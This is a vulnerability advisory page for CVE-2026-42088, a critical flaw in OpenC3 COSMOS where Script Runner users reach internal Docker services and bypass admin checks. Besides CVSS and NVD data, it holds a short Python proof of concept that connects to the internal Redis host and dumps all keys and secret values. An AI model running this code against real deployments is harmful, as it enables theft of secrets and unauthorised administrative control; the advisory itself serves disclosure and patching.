Security Vulnerability Report
中文
CVE-2026-42088 CVSS 9.6 CRITICAL

CVE-2026-42088

Published: 2026-05-04 18:16:31
Last Modified: 2026-05-13 20:47:47
Source: [email protected]

Description

OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openc3:cosmos:*:*:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:openc3:cosmos:7.0.0:rc1:*:*:open_source:*:*:* - VULNERABLE
cpe:2.3:a:openc3:cosmos:7.0.0:rc2:*:*:open_source:*:*:* - VULNERABLE
OpenC3 COSMOS < 7.0.0-rc3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC: Accessing internal Redis from Script Runner container import redis # Connect to Redis using the internal Docker network hostname # This bypasses the application-level API checks r = redis.Redis(host='redis', port=6379, db=0) print("[*] Attempting to dump Redis keys...") try: # List all keys to find sensitive data (secrets, configs) keys = r.keys('*') for key in keys: key_type = r.type(key).decode('utf-8') print(f"Found Key: {key}, Type: {key_type}") # Extract value if it is a string if key_type == 'string': val = r.get(key).decode('utf-8') print(f"Value: {val}") except Exception as e: print(f"Error: {e}") # Example: Writing to the bucket service (if accessible via HTTP API) # import requests # print("[*] Attempting to access bucket service...") # response = requests.get('http://openc3-buckets:3000/api/buckets') # print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42088", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.007", "lastModified": "2026-05-13T20:47:46.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:*:*:*:*:open_source:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "286B983F-D46F-46E4-8EEA-FFA6506A005B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:7.0.0:rc1:*:*:open_source:*:*:*", "matchCriteriaId": "38B72355-49A3-4D2F-BFDB-EE53C9E2C7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openc3:cosmos:7.0.0:rc2:*:*:open_source:*:*:*", "matchCriteriaId": "13E3A0EA-1085-4505-80BB-C0B133EC3498"}]}]}], "references": [{"url": "https://github.com/OpenC3/cosmos/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.